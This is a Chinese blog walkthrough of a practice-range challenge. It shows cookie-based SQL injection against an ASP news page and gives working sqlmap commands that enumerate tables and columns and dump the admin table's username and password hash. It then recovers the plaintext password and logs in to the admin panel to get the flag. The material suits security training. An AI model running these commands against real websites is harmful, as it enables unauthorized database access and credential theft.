sqlmap之cookie注入(靶场第二题)

sqlmap
靶场第二题:https://hack.zkaq.org/?a=battle&f=target&id=31ac789a52edf9bb
首先我们尝试下sql注入

http://120.203.13.75:8001/shownews.asp?id=171%20and%201=1

在这里插入图片描述
说明该网站有防sql注入。那么我们使用cookie注入

http://120.203.13.75:8001/shownews.asp?id=171%20order%20by%2010

在这里插入图片描述
第一步
猜解表

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --table --level 2

在这里插入图片描述
第二步,猜字段

 sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --column -T admin --level 2

在这里插入图片描述
第三步,爆数据

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171"  --dump  -T admin -C "username,password" --level 2

在这里插入图片描述
b9a2a2b5dffb918c,该密码是md5加密,百度搜索md5在线加密
在这里插入图片描述
我们已经拿到密码了
进入后台网站,利用御剑工作扫出后台
在这里插入图片描述
http://120.203.13.75:8001/admin
输入账号admin,密码welcome获取flag
在这里插入图片描述

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值